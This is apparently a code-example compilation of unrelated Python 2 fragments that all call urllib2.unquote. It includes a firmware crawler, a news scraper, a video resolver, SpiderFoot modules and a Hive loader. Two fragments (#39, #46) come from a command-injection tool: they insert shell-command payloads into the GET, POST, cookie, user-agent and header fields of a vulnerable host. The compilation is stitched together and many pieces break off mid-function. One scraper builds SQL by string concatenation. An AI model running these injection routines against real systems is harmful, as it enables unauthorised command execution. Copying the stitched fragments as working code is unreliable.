                        item["productVersion"] = regVersions.group()

                        #-----productModel-------
                        Modeldiv1 = filename.split("_")
                        Modeldiv1len = len(Modeldiv1)
                        if filename.split(
                                " "
                        )[0] == "Baseline":  # 匹配Baseline开头的固件Baseline IPD_Raptor_En_5.2.8_150124.zip
                            # baseline四种情况:
                            if len(
                                    filename.split(" ")
                            ) >= 4:  # 匹配 Baseline%20Firmware_IPC_R4%20series_En_V5.2.0%20140721.zip
                                item["productModel"] = filename.split(" ",
                                                                      2)[1]
                            elif len(
                                    filename.split(" ")
                            ) == 2:  # 匹配Baseline%20IPD_Raptor_En_5.3.0_150410.zip和Baseline_IPD_En_V3.2.0%20131223%28Released%29.zip
                                if regVersion.search(filename.split(" ")[1]):
                                    Modeldiv021 = filename.split(" ")[1].split(
                                        "_", 2)
                                    arr = []
                                    arr.append(Modeldiv021[0])
                                    arr.append(Modeldiv021[1])
                                    item["productModel"] = "_".join(arr)
                                else:
                                    Modeldiv022 = filename.split(" ")[1].split(
                                        "_", 2)
                                    arr = []
                                    arr.append(Modeldiv022[0])
                                    arr.append(Modeldiv022[1])
                                    item["productModel"] = "_".join(arr)
                            elif len(
                                    filename.split(" ")
                            ) == 3:  # 匹配Baseline%20IPC_R1_En_V5.2.0%20140721.zip

                                Modeldiv03 = filename.split(" ", 2)[1].split(
                                    "_", 2)
                                arr = []
                                arr.append(Modeldiv03[0])
                                arr.append(Modeldiv03[1])
                                item["productModel"] = "_".join(arr)

                        elif re.compile(r"[D,d]igicap").search(
                                filename):  # digicap_STD_V3.1.2_20140512.zip
                            item["productModel"] = "Digicap"
                        elif Modeldiv1len > 1 and regVersion.search(
                                Modeldiv1[1]
                        ):  # DS-6400HDI-T_V1.5.0 build 120601.rar.zip
                            item["productModel"] = Modeldiv1[0]

                        else:  # 普通情况,取前两位 NVR_71_4_8_SN_BL_EN_STD_V3.0.18_151231.zip
                            # Modeldiv1= firewName.split("_") #放到条件语句前定义
                            # 主要处理型号中多位数字这种情况 DS-71_72_73_81_80_9000HQHI(HGHI)-SH_ML_STD_V3.1.3_150212.zip
                            arr1 = []
                            count = 1  # 统计匹配到数字的位数
                            flags = False
                            for element in Modeldiv1:

                                if count < 3:
                                    if re.compile(r"\(").search(
                                            element
                                    ):  # 针对这种情况:NVR_%2871_16_SN%29BL_ML_Eurpon_South_STD_V3.0.17_150804.zip    NVR_(71
                                        flags = True
                                    if re.compile(r"\)").search(
                                            element
                                    ):  # 针对这种情况:NVR_%2871_16_SN%29BL_ML_Eurpon_South_STD_V3.0.17_150804.zip    NVR_(71
                                        flags = False
                                    arr1.append(element)
                                    count += 1
                                else:
                                    if regVersion.search(element):
                                        break
                                    if re.compile(r"^[0-9]\w*").search(
                                            element) or flags == True:
                                        arr1.append(element)
                                        count += 1
                                        if re.compile(r"\)").search(element):
                                            flags = False
                                    else:
                                        break

                            item["productModel"] = "_".join(arr1)
                        #-----productModel-------
                    else:
                        item["productVersion"] = ""
                        item["productModel"] = ""
                    print "firmwareName:", item["firmwareName"]
                    yield item
        #print "all suffix:",hikvisionSpider.allsuffix
        return
Пример #33
0
def fetchMiaopaiData():
  lastid = None;
  dr = re.compile(r'<[^>]+>',re.S)
  uname = '/app/yxtk/script/useragent.txt'
  f1 = open("/app/yxtk/script/data/leikejitechnews.sql",'w',buffering=-1)
  with open(uname) as f:
        useragents = f.readlines()  
  userAgent = random.choice(useragents) 
  url = ''
  headers = {
             'Accept':'*/*',
             'Accept-Encoding':'gzip, deflate, sdch',
             'Accept-Language':'zh-CN,zh;q=0.8',
             'Cache-Control':'max-age=0',
             'Connection':'keep-alive',
             'Host':'www.leikeji.com',
             'Referer':'http://www.leikeji.com/columns/articles/%E8%B5%84%E8%AE%AF',
             'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
            }
  while True:
      for k in range(0,2):
          time.sleep(1)
          pageNo = 0;
          for j in range(1,2):
             if k==0:
                 url = r'http://www.leikeji.com/columns/getArticleList?ifHome=1&status=1&channels=1&pageIndex=1&pageSize=10&orderBy=postDate&orderType=desc&colName=%E8%B5%84%E8%AE%AF'
             if k==1:
                 url = r'http://www.leikeji.com/columns/getArticleList?ifHome=1&status=1&channels=1&pageIndex=1&pageSize=10&orderBy=postDate&orderType=desc&colName=%E5%98%BF%E7%A7%91%E6%8A%80'
             print url
             try:
                 encoding_support = ContentEncodingProcessor
                 data = None;
                 opener = urllib2.build_opener(encoding_support)
                 opener.addheaders = [('User-agent', userAgent[:-2]),('Accept-Encoding',"gzip, deflate")]
                 urllib2.install_opener(opener)
                 req = urllib2.Request(url.strip(),data,headers)
                 con = urllib2.urlopen(req)
                 result = json.load(con);
                 result = json.dumps(result, sort_keys=True, indent=2)
                 result = json.loads(result);
                 result = result['data']
                 if len(result) == 0:
                    break; 
                 pageNo = len(result);
                 for i in range(0,pageNo):
                   life_id  = str(result[i]['onlyUrl']).encode('utf-8');
                   if result[i].has_key('title'):
                       life_title = "\" "+result[i]['title'].replace('\"','\'').encode('utf-8')+" \""
                       life_title = dr.sub('',life_title)
                       life_title = life_title.replace("\n",'')
                       life_title = life_title.replace(",",',')
                   else:
                       life_title = "";
                   life_date = result[i]['postDate']
                   if life_date.find('小时') > -1:
                        m = re.findall(r'(\w*[0-9]+)\w*',str(life_date))
                        life_date = datetime.datetime.today() - datetime.timedelta(hours=float(m[0]))
                        life_date = str(life_date.strftime("%Y-%m-%d %H:%M:%S"))
                   elif life_date.find('刚刚') > -1:
                        life_date = datetime.datetime.today()
                        life_date = str(life_date.strftime("%Y-%m-%d %H:%M:%S"))
                   if result[i].has_key('picUrl'):
                       life_pic = result[i]['picUrl'].encode('utf-8');
                   else:
                       life_pic = ""
                       life_id = '0000'
                   life_url = 'http://www.leikeji.com/article/'+life_id
                   imageUrl=qiniuUpdate(life_pic.strip())

                   req = urllib2.Request(life_url)
                   res = urllib2.urlopen(req)
                   html1 = unicode(res.read(),'utf-8')
                   res.close()
                   doc1 = pq(html1)
                   con = doc1('div.article-content')
                   con('img').removeAttr("style")
                   con('img').removeAttr("width")
                   con('img').removeAttr("height")
                   con('img').attr("style","width:100%")
                   p = con('div.article-content').html()
                   if p is None or p =='':
                     continue
                   p = re.sub(r'&#13;','',p)
                   p = re.sub(r'<style.*>([\S\s\t]*?)</style>','',p)
                   p = re.sub(r'<script.*>([\S\s\t]*?)</script>','',p)
                   p = re.sub(r'<p[^>]*>','<p>',p)
                   p = re.sub(r'<(?!img|br|p|/p).*?>','',p)
                   p = re.sub(r'\r','',p)
                   p = re.sub(r'\n','',p)
                   p = re.sub(r'\s','',p)
                   p = re.sub(r'src=',' src=',p)
                   life_id = str(life_id)+'00'

                   #newqiniu = pq(p)
                   #imgs = newqiniu('img')
                   #for image in imgs.items():
                    #imgurl = image('img').attr('src')
                    #newimgurl = qiniuUpdate(imgurl.strip())
                    #p = p.replace(str(imgurl),str(newimgurl))
                   sql = "INSERT INTO 3rd_technology(id,creator,modifier,create_time,modify_time,is_deleted,technology_id,title,third_date,img_url,sort,user_id,thumbnail_url,source,tag,content,push_flag,recommend_flag,view_status) VALUES(NULL,'sys','sys',now(),now(),'n','"+life_id+ "'," +life_title.strip() + ",'" + str(life_date) +"','"+life_pic.strip()+"','0','','"+imageUrl+"','雷科技','','"+p.strip()+"',0,NULL,0);"+'\n'
                   print sql
                   f1.writelines(sql)
                   file_name = urllib2.unquote(life_pic.strip()).decode('utf8').split('/')[-1]
                   os.remove('/app/yxtk/script/'+file_name)
             except Exception as e:
               print e
      break
  f1.close()
Пример #34
0
def loadVideos(url,name):
        #try:
           GA("LoadVideos",name)
           link=GetContent(url)
           newlink = ''.join(link.encode("utf-8").splitlines()).replace('\t','')
           vidurl=""
           match=re.compile("'file':\s*'(.+?)',").findall(newlink)
           if(len(match) == 0):
                   match=re.compile('<div class="video_main">\s*<iframe [^>]*src=["\']?([^>^"^\']+)["\']?[^>]*>').findall(newlink)
                   if(len(match)==0):
                           match=re.compile('<iframe [^>]*src=["\']?([^>^"^\']+)["\']?[^>]*>').findall(newlink)
                           if(len(match)==0):
                                   match=re.compile("<param name='flashvars' value='file=(.+?)&").findall(newlink)
                                   if(len(match)==0):
										match=re.compile('file:\s*"(.+?)",').findall(newlink)
           newlink=match[0]
           print newlink
           #xbmc.executebuiltin("XBMC.Notification(Please Wait!,Loading selected video)")
           if (newlink.find("dailymotion") > -1):
                match=re.compile('www.dailymotion.com/embed/video/(.+?)\?').findall(newlink+"?")
                if(len(match) == 0):
                        match=re.compile('www.dailymotion.com/video/(.+?)&dk;').findall(newlink+"&dk;")
                if(len(match) == 0):
                        match=re.compile('www.dailymotion.com/swf/(.+?)\?').findall(newlink)
                if(len(match) == 0):
                	match=re.compile('www.dailymotion.com/embed/video/(.+?)\?').findall(newlink.replace("$","?"))
                vidlink=getDailyMotionUrl(match[0])
                playVideo('dailymontion',vidlink)
           elif (newlink.find("docs.google.com") > -1 or newlink.find("drive.google.com") > -1):  
                docid=re.compile('/d/(.+?)/preview').findall(newlink)[0]
                vidcontent = GetContent("https://docs.google.com/get_video_info?docid="+docid) 
                html = urllib2.unquote(vidcontent)
                try:
					html=html.encode("utf-8","ignore")
                except: pass
                stream_map = re.compile('fmt_stream_map=(.+?)&fmt_list').findall(html)
                if(len(stream_map) > 0):
					formatArray = stream_map[0].replace("\/", "/").split(',')
					for formatContent in formatArray:
						 formatContentInfo = formatContent.split('|')
						 qual = formatContentInfo[0]
						 vidlink = (formatContentInfo[1]).decode('unicode-escape')

                else:
						cj = cookielib.LWPCookieJar()
						newlink1="https://docs.google.com/uc?export=download&id="+docid  
						(cj,vidcontent) = GetContent2(newlink1,newlink, cj)
						soup = BeautifulSoup(vidcontent)
						downloadlink=soup.findAll('a', {"id" : "uc-download-link"})[0]
						newlink2 ="https://docs.google.com" + downloadlink["href"]
						vidlink=GetDirVideoUrl(newlink2,cj) 
                playVideo('google',vidlink)
           elif (newlink.find("vimeo") > -1):
                #
                print "newlink|" + newlink
                idmatch =re.compile("//player.vimeo.com/video/(.+?)\?").findall(newlink+"?")
                print idmatch
                vidurl=getVimeoUrl(idmatch[0],"http://"+url.split('/')[2])
                playVideo('khmeravenue',vidurl)
           elif (newlink.find("sendvid.com") > -1):
				sid = urllib2.unquote(newlink).replace("//", "http://")
				link=GetContent(sid)
				match = re.compile('<source src="(.+?)"').findall(link)
				vidurl = urllib2.unquote(match[0]).replace("//", "http://")
				playVideo('sendvid',vidurl)
           elif (newlink.find("vid.me") > -1):
                link=GetContent(newlink)
                link = ''.join(link.splitlines()).replace('\'','"')
                match=re.compile('<meta property="og:video:url" [^>]*content=["\']?([^>^"^\']+)["\']?[^>]*>').findall(link)
                for vbam in match:
                     if(vbam.find(newlink) == -1):
                          vidurl=urllib2.unquote(vbam).replace("&amp;","&") 
                playVideo('khmeravenue',vidurl)
           elif (newlink.find("videobam") > -1):
                link=GetContent(newlink)
                link = ''.join(link.splitlines()).replace('\'','"')
                match=re.compile('"url"\s*:\s*"(.+?)","').findall(link)
                for vbam in match:
                     if(vbam.find("mp4") > -1):
                          vidurl=vbam.replace("\\","")
                playVideo('khmeravenue',vidurl)
           elif (newlink.find("4shared") > -1):
                d = xbmcgui.Dialog()
                d.ok('Not Implemented','Sorry 4Shared links',' not implemented yet')
           else:
                if (newlink.find("linksend.net") > -1):
                     d = xbmcgui.Dialog()
                     d.ok('Not Implemented','Sorry videos on linksend.net does not work','Site seem to not exist')
                newlink1 = urllib2.unquote(newlink).decode("utf8")+'&dk;'
                print 'NEW url = '+ newlink1
                match=re.compile('(youtu\.be\/|youtube-nocookie\.com\/|youtube\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)').findall(newlink1)
                if(len(match) == 0):
                    match=re.compile('http://www.youtube.com/watch\?v=(.+?)&dk;').findall(newlink1)
                if(len(match) > 0):
                    lastmatch = match[0][len(match[0])-1].replace('v/','')
                    #d = xbmcgui.Dialog()
                    #d.ok('mode 2',str(lastmatch),'launching yout')
                    playVideo('youtube',lastmatch)
                else:
                    playVideo('moviekhmer',urllib2.unquote(newlink).decode("utf8"))
Пример #35
0
DOI_REGEXP_FLAGS = re.IGNORECASE | re.VERBOSE

# error messages
ERR_STR_PREFIX = 'status\terr\t'
ERR_STR_FETCH = 'Unable to fetch the bibliographic data: '
ERR_STR_TRY_AGAIN = 'The server may be down.  Please try later.'
ERR_STR_NO_DOI = 'No document object identifier found in the URL: '
ERR_STR_REPORT = 'Please report the error to [email protected].'

# read url from std input
url = sys.stdin.readline()
# get rid of the newline at the end
url = url.strip()

# 'unparse' url to remove %HH escapes which confuse the DOI parser below
url = urllib2.unquote(url)

# parse the DOI from the url and exit gracefully if not found
doi_match = re.search(DOI_REGEXP, url, DOI_REGEXP_FLAGS)
if not doi_match:
    print ERR_STR_PREFIX + ERR_STR_NO_DOI + url + '.  ' + ERR_STR_REPORT
    raise

doi_prefix = doi_match.group(1)
doi_suffix = doi_match.group(2)
url_doi = doi_prefix + DOI_URL_SEP + doi_suffix
doi = doi_prefix + DOI_SEP + doi_suffix

# fetch the BibTeX entry for the DOI and exit gracefully in case of trouble
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
Пример #36
0
        if numCores >= str(nCores) or numCores == '0':
            numCores = str(nCores - 1)
    except:
        pass

    #retrieve the current working directory
    #TODO: Remove the cookie block once it's confirmed safe to do so
    curDir = ""
    if 'HTTP_COOKIE' in os.environ:
        try:
            cookiestr = os.environ.get('HTTP_COOKIE')
            c = Cookie.SimpleCookie()
            c.load(cookiestr)

            curDir = urllib2.unquote(c['OGCWOrkingDir'].value)
        except:
            pass  #fall out quietly for now

    #get values passed from Angular's $sessionStorage
    #supersedes cookies
    curDir = query.getvalue('OGCWOrkingDir')

    #TODO: os.path.join() this
    #if WIN_PLATFORM_NONFREE:
    #    curDir = curDir.replace('\\', '\\\\')

    #default input file created by script 1 in the previous step (vcfload.py)
    inpfile = 'pre_processed_inp_file.vcf.gz'

    #suppress output, if any, and run API call
Пример #37
0
        except:
            continue
        sub_vers = html.fromstring(subroot).xpath(
            repo["sub_discovery_pattern"],
            namespaces={"regex": "http://exslt.org/regular-expressions"})
        for sub_ver in sub_vers:
            sub_ver = sub_ver.lstrip('/')
            # The try - except block is used because 404 errors and similar
            # might happen (and actually happen because not all repos have
            # packages we need)
            try:
                source = repo["root"] + sub_ver
                page = urlopen(source, timeout=URL_TIMEOUT).read()
                rpms = html.fromstring(page).xpath(
                    repo["page_pattern"],
                    namespaces={
                        "regex": "http://exslt.org/regular-expressions"
                    })

                source = source.replace("index.html", "")
                for rpm in rpms:
                    urls.add(source + str(unquote(rpm)))
            except:
                continue

#
# Print URLs to stdout
#
for url in urls:
    print(url)
Пример #38
0
    def handleEvent(self, event):
        eventName = event.eventType
        srcModuleName = event.module
        eventData = event.data
        self.currentEventSrc = event

        if self.errorState:
            return None

        self.sf.debug("Received event, " + eventName + ", from " +
                      srcModuleName)

        if self.opts['google_api_key'] == "" and self.opts[
                'bing_api_key'] == "":
            self.sf.error(
                "You enabled sfp_socialprofiles but did not set a Google or Bing API key!",
                False)
            self.errorState = True
            return None

        # Don't look up stuff twice
        if eventData in self.results:
            self.sf.debug("Skipping " + eventData + " as already mapped.")
            return None
        else:
            self.results[eventData] = True

        if self.keywords is None:
            self.keywords = self.sf.domainKeywords(self.getTarget().getNames(),
                                                   self.opts["_internettlds"])
            if len(self.keywords) == 0:
                self.keywords = None

        for site in sites:
            s = unicode(sites[site][0]).format(name=eventData)
            searchStr = s.replace(" ", "%20")
            res = None

            if self.opts["method"].lower() == "yahoo":
                self.sf.error(
                    "Yahoo is no longer supported. Please try 'bing' or 'google'.",
                    False,
                )
                return None

            if self.opts["method"].lower() == "google":
                res = self.sf.googleIterate(
                    searchString=searchStr,
                    opts={
                        "timeout": self.opts["_fetchtimeout"],
                        "useragent": self.opts["_useragent"],
                        "api_key": self.opts["google_api_key"],
                        "cse_id": self.opts["google_cse_id"],
                    },
                )
                self.__dataSource__ = "Google"

            if self.opts["method"].lower() == "bing":
                res = self.sf.bingIterate(
                    searchString=searchStr,
                    opts={
                        "timeout": self.opts["_fetchtimeout"],
                        "useragent": self.opts["_useragent"],
                        "count": self.opts["count"],
                        "api_key": self.opts["bing_api_key"],
                    },
                )
                self.__dataSource__ = "Bing"

            if res is None:
                self.sf.info("No data returned from " + self.opts["method"] +
                             ".")
                continue

            if self.checkForStop():
                return None

            # Submit the results for analysis
            evt = SpiderFootEvent("RAW_RIR_DATA", str(res), self.__name__,
                                  event)
            self.notifyListeners(evt)

            instances = list()
            for searchDom in sites[site][1]:
                # Search both the urls & the search engine web content
                search_string = " ".join(res["urls"] + [str(res)])

                matches = re.findall(searchDom, search_string,
                                     re.IGNORECASE | re.MULTILINE)

                if not matches:
                    continue

                for match in matches:
                    self.sf.debug("Match found: " + match)
                    if match in instances:
                        continue
                    else:
                        instances.append(match)

                    if self.checkForStop():
                        return None

                    # Fetch the profile page if we are checking
                    # for a firm relationship.
                    # Keywords might be empty if the target was an IP, subnet or name.
                    if self.opts["tighten"] and self.keywords:
                        match = urllib2.unquote(match)
                        self.sf.debug("Tightening results to look for " +
                                      str(self.keywords))
                        pres = self.sf.fetchUrl(
                            match,
                            timeout=self.opts["_fetchtimeout"],
                            useragent=self.opts["_useragent"],
                        )

                        if pres["content"] is None:
                            continue
                        else:
                            found = False
                            for kw in self.keywords:
                                if re.search(
                                        "[^a-zA-Z\-\_]" + kw + "[^a-zA-Z\-\_]",
                                        pres["content"],
                                        re.IGNORECASE,
                                ):
                                    found = True
                            if not found:
                                continue

                    self.sf.info("Social Media Profile found at " + site +
                                 ": " + match)
                    match = urllib2.unquote(match)
                    evt = SpiderFootEvent("SOCIAL_MEDIA", site + ": " + match,
                                          self.__name__, event)
                    self.notifyListeners(evt)
Пример #39
0
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):

  print "\n(*) Retrieving the length of execution output..."
  for j in range(1,int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if not alter_shell :
      payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
    else:
      payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
      
    start = 0
    end = 0
    start = time.time()
    
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      payload = urllib.quote(payload)
      
      # Check if its not specified the 'INJECT_HERE' tag
      url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      
      #print target
      request = urllib2.Request(target)
  
      # Check if defined extra headers.
      headers.do_check(request)
		      
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
	try:
	  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	  opener = urllib2.build_opener(proxy)
	  urllib2.install_opener(opener)
	  response = urllib2.urlopen(request)
	  response.read()
	  
	except urllib2.HTTPError, err:
	  print "\n(x) Error : " + str(err)
	  sys.exit(1) 
  
      else:
	response = urllib2.urlopen(request)
	response.read()
	
    # Check if defined method is POST.
    else :
      parameter = menu.options.data
      parameter = urllib2.unquote(parameter)
      
      # Check if its not specified the 'INJECT_HERE' tag
      parameter = parameters.do_POST_check(parameter)
      
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
      
      # Check if defined extra headers.
      headers.do_check(request)

      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
	try:
	  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	  opener = urllib2.build_opener(proxy)
	  urllib2.install_opener(opener)
	  response = urllib2.urlopen(request)
	  response.read()
	  
	except urllib2.HTTPError, err:
	  print "\n(x) Error : " + str(err)
	  sys.exit(1) 
  
      else:
Пример #40
0
 def _get_uri_path(self, uri):
     return urllib2.unquote(urlparse.urlparse(uri).path)
Пример #41
0
            return "The name '{}' is already in use.".format(d['cagename'])        
        d_cages={}
        for col in set(getAllColumns('cages')) & set(d.keys()):
            d_cages[col]=d[col]
        columns=', '.join(d_cages.keys())
        parameters = ', '.join(['%({0})s'.format(k) for k in d_cages.keys()])
        query = 'INSERT INTO cages ({0}) VALUES ({1})'.format(columns, parameters)
        db.execute(query,d)
        m_id=db.execute("SELECT id FROM cages where name=%s",(d['cagename'],))[0][0]
        self.d={"id":m_id, 'cagename':d['cagename']}
        
        if d['caretaker'] is not None:
            db.execute("INSERT INTO care_taker SET cage_id=%s, lab_member_id=(SELECT id FROM lab_members WHERE name=%s)",(self.d['id'],d['caretaker']))
        return "Successfully added cage"
        
if __name__=='__main__':
    data='name=testmouse&tag=pop&strain=C57BL/6&sex=female&life_status=alive&breeding_status=unknown&DOB=2013-08-26&DOD=2013-08-20&cause_of_death=flogging&notes=&mother=lalala&father=kite&reserve_lab_member=Ethan&reserve_date=2013-08-07&reserve_description=an experiment&genotyped=True&gene1=i-tdTomato&zygosity1= -&gene2=&zygosity2=&cagename=wt1&startDate=2013-08-26&oldcagename1=&startDate1=&endDate1='
    data=urllib2.unquote(data.replace('+',' '))
    data2=[[b for b in c.split('=')] for c in data.split('&')] #list of lists
    m=Mouse()
    d={}
    for i in data2:
        if i[1]=='':
            d[i[0]]=None
        elif i[1]=='True':
            d[i[0]]=1
        elif i[1]=='False':
            d[i[0]]=0
        else:
            d[i[0]]=i[1] #now in dictionary
    m.addToDB(d)
Пример #42
0
    def get(self, request, *args, **kwargs):
        results = []
        # allow choice of release, default to 2012 1-year
        release = self.request.GET.get('release', 'ACS 2012 1-Year')

        # comparison query builder throws a search term here,
        # so force it to look at just one release
        q = self.request.GET.get('q', None)
        topics = self.request.GET.get('topics', None)
        tables = Table.objects.filter(release=release)
        columns = Column.objects.filter(table__release=release)

        if q:
            q = q.strip()
            if q == '*':
                columns = None
            else:
                tables = tables.filter(
                    Q(table_name__icontains=q) | Q(table_id__icontains=q))
                columns = columns.filter(
                    Q(column_name__icontains=q) | Q(column_id=q)
                    | Q(table__table_id=q))
        else:
            # only fetch tables on unfiltered query
            columns = None

        if topics:
            topic_list = unquote(topics).split(',')
            for topic in topic_list:
                tables = tables.filter(topics__contains=topic)
                if columns:
                    columns = columns.filter(table__topics__contains=topics)

        # short-circuit if just requesting a count
        count = self.request.GET.get('count', None)
        if count == 'tables':
            return render_json_to_response({'count': tables.count()})

        tables = tables.extra(select={
            'length': 'Length(table_id)'
        }).extra(order_by=['length', 'table_id'])
        tables = tables.values('table_id', 'table_name', 'topics', 'length')
        tables_list = [
            self.format_result(table, 'table') for table in list(tables)
        ]
        results.extend(tables_list)

        if columns:
            columns = columns.values('parent_table_id', 'table__table_name',
                                     'table__topics', 'column_id',
                                     'column_name')
            columns_list = [
                self.format_result(column, 'column')
                for column in list(columns)
            ]
            results.extend(columns_list)

        table = self.request.GET.get('table', None)
        if table:
            tables = tables.filter(table_name__icontains=table).values()
            results['tables'] = list(tables)

        column = self.request.GET.get('column', None)
        if column:
            columns = columns.filter(column_name__icontains=column).values()
            columns = columns.only('table', 'parent_table_id', 'column_name',
                                   'column_id')
            results['columns'] = list(columns)

        return render_json_to_response(results)
Пример #43
0
def getResponseURL(opener, url, post_data=None, debug=False):
    return urllib2.unquote(_getResponse(opener, url, post_data, debug).url)
Пример #44
0
	urllib2.install_opener(opener)
	response = urllib2.urlopen(request)
	response.read()
	
      except urllib2.HTTPError, err:
	print "\n(x) Error : " + str(err)
	sys.exit(1) 

    else:
      response = urllib2.urlopen(request)
      response.read()
      
  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
    
    # Define the POST data
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    request = urllib2.Request(url, data)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Check if defined any HTTP Proxy.
Пример #45
0
                        "INSERT INTO ti(data,threat,threat_info) VALUES (?,?,?)",
                        (u, data[5], data[7]))

        if data[3] == 'rss':

            feeds = feedparser.parse(data[2])
            for feed in feeds.entries:

                if data[9] == 'manual':
                    re_domain = re.findall(data[10], feed.title_detail.value)
                    re_threat = re.findall(data[8], str(feed.summary_detail))

                    for d, thr in zip(re_domain, re_threat):
                        c.execute(
                            "INSERT INTO URL(url,threat,threat_info) VALUES (?,?,?)",
                            (urllib.unquote(d), data[5], thr))
                        c.execute(
                            "INSERT INTO ti(data,threat,threat_info) VALUES (?,?,?)",
                            (urllib.unquote(d), data[5], thr))

                if data[9] == 'link':

                    try:
                        re_domain = re.findall(data[10], feed.link)
                    except:
                        re_domain = re.findall(data[10], data[2])

                    for d in re_domain:
                        c.execute(
                            "INSERT INTO URL(url,threat,threat_info) VALUES (?,?,?)",
                            (urllib.unquote(d), data[5], feed.title))
Пример #46
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace,
              http_request_method, url, vuln_parameter, alter_shell, filename):

    # Execute shell commands on vulnerable host.
    if alter_shell:
        payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
        payload = eb_payloads.cmd_execution(separator, TAG, cmd)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    # Fixation for specific payload.
    if ")%3B" + urllib.quote(")}") in payload:
        payload = payload.replace(")%3B" + urllib.quote(")}"),
                                  ")" + urllib.quote(")}"))

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    if settings.TAMPER_SCRIPTS['base64encode']:
        from src.core.tamper import base64encode
        payload = base64encode.encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
        sys.stdout.write("\n" + settings.print_payload(payload))

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
        response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
        # Check if defined method is GET (Default).
        if http_request_method == "GET":
            # Check if its not specified the 'INJECT_HERE' tag
            #url = parameters.do_GET_check(url)

            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request
            response = requests.get_request_response(request)

        else:
            # Check if defined method is POST.
            parameter = menu.options.data
            parameter = urllib2.unquote(parameter)

            # Check if its not specified the 'INJECT_HERE' tag
            parameter = parameters.do_POST_check(parameter)

            # Define the POST data
            if settings.IS_JSON == False:
                data = re.sub(settings.INJECT_TAG, payload, parameter)
                request = urllib2.Request(url, data)
            else:
                payload = payload.replace("\"", "\\\"")
                data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                              parameter)
                data = json.loads(data, strict=False)
                request = urllib2.Request(url, json.dumps(data))

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request
            response = requests.get_request_response(request)

    return response
Пример #47
0
def encode_url(url):
    if url == unquote(url):
        return quote(url.encode('utf-8'), safe='~@#$&()*!+=:;,.?/\'')
    else:
        return url
Пример #48
0
    def run(self, date):

        db_class = self.config.primary_destination.database_class
        primary_database = db_class(self.config.primary_destination)
        tx_class = self.config.primary_destination.transaction_executor_class
        primary_transaction = tx_class(
            self.config,
            primary_database,
        )
        transactions = [primary_transaction]

        db_class = self.config.secondary_destination.database_class
        # The reason for checking if this is anything at all is
        # because one way of disabling the secondary destination
        # is to set the database_class to an empty string.
        if db_class:
            secondary_database = db_class(self.config.secondary_destination)
            if secondary_database.config != primary_database.config:
                # The secondary really is different from the first one.
                # By default, if not explicitly set, it'll pick up the same
                # resource values as the first one.
                tx_class = (self.config.secondary_destination.
                            transaction_executor_class)
                secondary_transaction = tx_class(
                    self.config,
                    secondary_database,
                )
                transactions.append(secondary_transaction)

        target_date = (date - datetime.timedelta(days=1)).strftime('%Y-%m-%d')

        raw_adi_logs_pathname = os.path.join(
            tempfile.gettempdir(),
            "%s.raw_adi_logs.TEMPORARY%s" % (target_date, '.txt'))
        try:
            with codecs.open(raw_adi_logs_pathname, 'w', 'utf-8') as f:
                hive = pyhs2.connect(
                    host=self.config.hive_host,
                    port=self.config.hive_port,
                    authMechanism=self.config.hive_auth_mechanism,
                    user=self.config.hive_user,
                    password=self.config.hive_password,
                    database=self.config.hive_database,
                    # the underlying TSocket setTimeout() wants milliseconds
                    timeout=self.config.timeout * 1000)

                cur = hive.cursor()
                query = self.config.query % target_date
                cur.execute(query)
                rows_written = 0
                for row in cur:
                    if None in row:
                        continue
                    f.write("\t".join(
                        self.remove_control_characters(urllib2.unquote(v)).
                        replace('\\', '\\\\') if isinstance(v, basestring
                                                            ) else str(v)
                        for v in row))
                    f.write("\n")
                    rows_written += 1

            if not rows_written:
                raise NoRowsWritten('hive yielded no rows to write')

            self.config.logger.info('Wrote %d rows from doing hive query' %
                                    rows_written)
            for transaction in transactions:
